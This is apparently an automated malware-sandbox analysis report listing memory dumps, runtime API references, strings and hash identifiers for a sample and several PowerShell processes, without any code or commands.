                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__output_l
                                                                                                                            • String ID: B
                                                                                                                            • API String ID: 2141734944-1255198513
                                                                                                                            • Opcode ID: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                            • Instruction ID: c3381635c56eef19766f4d2b6cec93033e09c9dbfea035f29709b790cff329ad
                                                                                                                            • Opcode Fuzzy Hash: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                            • Instruction Fuzzy Hash: AD016175D002099FDF10DFA9CC41AEEBBB4EB04364F14411AE824AA280D7749905CBB9
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0362957F
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EF9B
                                                                                                                              • Part of subcall function 0362EF86: __CxxThrowException@8.LIBCMT ref: 0362EFB0
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EFC1
                                                                                                                            • _memmove.LIBCMT ref: 036295B5
                                                                                                                            Strings
                                                                                                                            • invalid string position, xrefs: 0362957A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: invalid string position
                                                                                                                            • API String ID: 1785806476-1799206989
                                                                                                                            • Opcode ID: ed25437e7a8b00492c310d3cdf296206fb8cbba77b61dea343f1812fe2f6b963
                                                                                                                            • Instruction ID: c220123c09e4b81c11d15b8e177b3ef32ce595f4c75d1f9aa1d44f3af7f339a0
                                                                                                                            • Opcode Fuzzy Hash: ed25437e7a8b00492c310d3cdf296206fb8cbba77b61dea343f1812fe2f6b963
                                                                                                                            • Instruction Fuzzy Hash: AB01A731700B214FD325CE2CED9461BBBE79BC5640F2A492CD081DB749D771DC524BA4
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0362D1D4
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF4E
                                                                                                                              • Part of subcall function 0362EF39: __CxxThrowException@8.LIBCMT ref: 0362EF63
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF74
                                                                                                                            • _memmove.LIBCMT ref: 0362D20D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1785806476-3788999226
                                                                                                                            • Opcode ID: b46990320be02e5848981868a952af6c9bbcad042ba6c2ce62f485940f91049f
                                                                                                                            • Instruction ID: bac469e1f0ca58d0f2266af7cf68026d6cc74f398465a74f70f4000b9cfedac8
                                                                                                                            • Opcode Fuzzy Hash: b46990320be02e5848981868a952af6c9bbcad042ba6c2ce62f485940f91049f
                                                                                                                            • Instruction Fuzzy Hash: D401D876A407115FCB00EF6DF891E6E7B98E642250B4A563EEC32D760CE771E8448B90
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 03628443
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF4E
                                                                                                                              • Part of subcall function 0362EF39: __CxxThrowException@8.LIBCMT ref: 0362EF63
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF74
                                                                                                                            • _memmove.LIBCMT ref: 0362846E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1785806476-3788999226
                                                                                                                            • Opcode ID: c3382e288381ac5a5ce59c567d5d2e8a1bc8280252e685e8c1a5acc86903681e
                                                                                                                            • Instruction ID: 1c82efd048486658533347f4a1efb6ce0e9a91bcca7fdb3853f0a9c2d2ffefb6
                                                                                                                            • Opcode Fuzzy Hash: c3382e288381ac5a5ce59c567d5d2e8a1bc8280252e685e8c1a5acc86903681e
                                                                                                                            • Instruction Fuzzy Hash: 9201A2B16007159FCB24DEA9DC91D2BBBE8EF54214319493DE856CB744E631F800CB61
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallFrame@12Setting__getptd
                                                                                                                            • String ID: j
                                                                                                                            • API String ID: 3454690891-2137352139
                                                                                                                            • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                            • Instruction ID: 485dd21f4a90035941cd388f95717001b6757ca0dd6209e30ca5a99883d2a0f8
                                                                                                                            • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                            • Instruction Fuzzy Hash: E5115B7D800259EBCF12EF58C5443ACBB71BF16718F1A8089E459AB682C3746991CFD2
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C432AE: __getptd.LIBCMT ref: 02C432B4
                                                                                                                              • Part of subcall function 02C432AE: __getptd.LIBCMT ref: 02C432C4
                                                                                                                            • __getptd.LIBCMT ref: 02C437D8
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __getptd.LIBCMT ref: 02C437E6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 803148776-1018135373
                                                                                                                            • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                            • Instruction ID: 0ec54feaf1fc62e9df8cd6560a488ce4b58afe5dfa758350df41feb399f15721
                                                                                                                            • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                            • Instruction Fuzzy Hash: 97014B368012858BCF34AF26C4406AEF3B6AFC0311F7449AED8945B760CF76A681DF11
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0364010A: __getptd.LIBCMT ref: 03640110
                                                                                                                              • Part of subcall function 0364010A: __getptd.LIBCMT ref: 03640120
                                                                                                                            • __getptd.LIBCMT ref: 036406E3
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                            • __getptd.LIBCMT ref: 036406F1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 803148776-1018135373
                                                                                                                            • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                            • Instruction ID: ee6135e8f1d5a0f39ab3dde0688659bc4c933f8b67095c1de14d901e73bd63cc
                                                                                                                            • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                            • Instruction Fuzzy Hash: BE01A938C00321EECF34EF60C6886ACF7B9AF00210F28486ED1499A391CB30C580CF42
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 028937AF
                                                                                                                              • Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
                                                                                                                              • Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6
                                                                                                                            • __getptd.LIBCMT ref: 028937BD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 803148776-1018135373
                                                                                                                            • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                            • Instruction ID: 26bc4e3dbb4807e6bac4a4ae70bc7ed7504fdca6f0de0bc01433375a5566944c
                                                                                                                            • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                            • Instruction Fuzzy Hash: 72016D3C900205DBCF35AFA9C4446ACB3B6BF04315F6C88ADE448E6250DB319580DF52
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 034C00A2
                                                                                                                              • Part of subcall function 034B381A: __getptd_noexit.LIBCMT ref: 034B381D
                                                                                                                              • Part of subcall function 034B381A: __amsg_exit.LIBCMT ref: 034B382A
                                                                                                                            • __getptd.LIBCMT ref: 034C00B0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: csm
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.1752763478.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_e40000_powershell.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.1752371943.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_ddd000_powershell.jbxd
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3370465b8a85b408d31b6d76fd41a4ae6380cd8f188cc20209310227fc0c5e58
                                                                                                                            • Instruction ID: 011589f63dba8b1df3d3a710dd75a298cf6b46cdf7f5ba6932b9a80a948d8c8b
                                                                                                                            • Opcode Fuzzy Hash: 3370465b8a85b408d31b6d76fd41a4ae6380cd8f188cc20209310227fc0c5e58
                                                                                                                            • Instruction Fuzzy Hash: 87222874A00209DFDB05DF98C494AAEFBB1FF48310F29855AE845AB365C735ED81CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b553774dfebc846fca5bb6b8b4ec23f2b5d4846ccb6df1b7629175050ca430be
                                                                                                                            • Instruction ID: 8ef9212ace407bc7db656c4bda78b0a8e87c410ed17fe1a99f0432714a2656c0
                                                                                                                            • Opcode Fuzzy Hash: b553774dfebc846fca5bb6b8b4ec23f2b5d4846ccb6df1b7629175050ca430be
                                                                                                                            • Instruction Fuzzy Hash: 97D12A74E01249DFCB05DFA8D584AADFBB1EF48310F698156E844AB361CB31ED45DBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4811e24b0d8c8a624bc57afef8fa7500e3d7fba404dd98f1956db2e9468ff100
                                                                                                                            • Instruction ID: 02a73451f6bb454d1c34c6aa386cf93d4b55cf320751bfaefc61d4d8f5213824
                                                                                                                            • Opcode Fuzzy Hash: 4811e24b0d8c8a624bc57afef8fa7500e3d7fba404dd98f1956db2e9468ff100
                                                                                                                            • Instruction Fuzzy Hash: FFC1A235A04248DFCB14EFA8D944A9DBBF6FF84310F258559E806AB365CB34ED49CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8f7a130b77dafd6c8b3ef539b209a803a2473f80ecc4cafb0f7adb2a7d4c35c3
                                                                                                                            • Instruction ID: 2c1fa84ce6524748dc0968f07c9b7ca2d0c128370c0c5e11fe3335abc15b57da
                                                                                                                            • Opcode Fuzzy Hash: 8f7a130b77dafd6c8b3ef539b209a803a2473f80ecc4cafb0f7adb2a7d4c35c3
                                                                                                                            • Instruction Fuzzy Hash: F8A17970A002458FCB19DF58C5949BEBBB1FF88310B25859AD855AB3A9C735FC91CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3b8a41d8c11a271a2fb877f8cc661037d459c97b364f1223746aa616d52ce3af
                                                                                                                            • Instruction ID: 073788544982c7c3da39854b2330b59530781bc09ef37f00c6c8be374e3e26ed
                                                                                                                            • Opcode Fuzzy Hash: 3b8a41d8c11a271a2fb877f8cc661037d459c97b364f1223746aa616d52ce3af
                                                                                                                            • Instruction Fuzzy Hash: F2712C70A00248DFDF14EFA5D985BADBBF2BF88304F248429D415AB261DB35AD86CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bba27bde7dcac7825e7a349992c9a7c8125e4d0c5357ad2fe054abde9bbcdcc5
                                                                                                                            • Instruction ID: d7c57bfb975e8b3407089149b1ef847de1d451ec151fee2bd1eeaa8583afcae1
                                                                                                                            • Opcode Fuzzy Hash: bba27bde7dcac7825e7a349992c9a7c8125e4d0c5357ad2fe054abde9bbcdcc5
                                                                                                                            • Instruction Fuzzy Hash: 1F51DE31A082018FDB14EB34D854BADBBF2AF89751F288469E006DB3A1DB31DD01CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d66b06b5319d432ba3491451a28f5bc5dc1b61ce2f35e1d379e4d5c82af9dd14
                                                                                                                            • Instruction ID: 4daae40bd2bf7b4ac0a376461f9ee65f01e1323b6d9616ddd1d71876afbb274f
                                                                                                                            • Opcode Fuzzy Hash: d66b06b5319d432ba3491451a28f5bc5dc1b61ce2f35e1d379e4d5c82af9dd14
                                                                                                                            • Instruction Fuzzy Hash: 66518071A00218DFDB14EFA9D845BAEBBF2FF88314F248429D405AB361DB75AD45CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ad506b247563efc58fa8bed5fd9d956225bc20dfd57811a727c40c7e4630838b
                                                                                                                            • Instruction ID: 6f8b58d3e5910f5cab1a32b54c0b552f2d9d8acb8b8601709367341c3ad3373d
                                                                                                                            • Opcode Fuzzy Hash: ad506b247563efc58fa8bed5fd9d956225bc20dfd57811a727c40c7e4630838b
                                                                                                                            • Instruction Fuzzy Hash: 2151AF30A04248CFDB14EF75C8547ADBBF2BF89310F248529D446AB3A1DB74AC45CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4d6d315f96687ca7d60ee29fc88cfac5d6580e45306b2f6c83d66ad525545fc8
                                                                                                                            • Instruction ID: c50af3fed588b01870621bec9979fee112d9a3eed0a32b79aab6cdb8dbf68794
                                                                                                                            • Opcode Fuzzy Hash: 4d6d315f96687ca7d60ee29fc88cfac5d6580e45306b2f6c83d66ad525545fc8
                                                                                                                            • Instruction Fuzzy Hash: 914117B1E3424B9FDB308E348921AA6BBA3AF817C4F1880A5D904DB255D735DA54C7E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            • Instruction ID: d349369935283fee533e8bc4aed571eab8c83674485d5530e68ef3b36efb3b53
                                                                                                                            • Opcode Fuzzy Hash: 6a767f0e509b7415541907c69ee727dc96527503dc748081c7c81f2abe2b5a8c
                                                                                                                            • Instruction Fuzzy Hash: A9218BB173420B6BD734992A8C01B77B6D6DBC0754F24842AA505CF382CD76D849C3A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                            • API String ID: 0-2049395529
                                                                                                                            • Opcode ID: cb47c352254c5275bf1c3b35ced7b97dbde69956bae90be536d2ae4586b94659
                                                                                                                            • Instruction ID: 215967ebdcf0b368e55c57c5ae0354569d905aa4e4ba82ae1c01ddd7ad5103a2
                                                                                                                            • Opcode Fuzzy Hash: cb47c352254c5275bf1c3b35ced7b97dbde69956bae90be536d2ae4586b94659
                                                                                                                            • Instruction Fuzzy Hash: 1B01DF61A1E38A4FC73B123818281966FB65FC3A9072A40EBC440DF39BCD248C4D83A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.2011549736.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_afd000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 961978d9501b9a5f86b2d46ff781fe6f0ec7a0185a63b04e5e33b67b98a63458
                                                                                                                            • Instruction ID: f85935fdece94b9219fe24993842ff3bb31d1dea2901fdd4764b9c53d44e67bd
                                                                                                                            • Opcode Fuzzy Hash: 961978d9501b9a5f86b2d46ff781fe6f0ec7a0185a63b04e5e33b67b98a63458
                                                                                                                            • Instruction Fuzzy Hash: 23014C6100E3C49ED7138B258894B62BFB4EF53224F1DC0DBE9888F1A3C6699849C772
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.2011549736.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_afd000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d0112b09a1b284929af3b12055dec3cf80095426f8e64b97827db0bac4970fc7
                                                                                                                            • Instruction ID: bd6da9d69961b0cfda6988f872db09f1ce0b40b6dde09485327d4a2de9dddf6d
                                                                                                                            • Opcode Fuzzy Hash: d0112b09a1b284929af3b12055dec3cf80095426f8e64b97827db0bac4970fc7
                                                                                                                            • Instruction Fuzzy Hash: B001F7710083089AE7124F65C984777BFA8DF41324F18C52AFE0A4B146CA79D841C6B1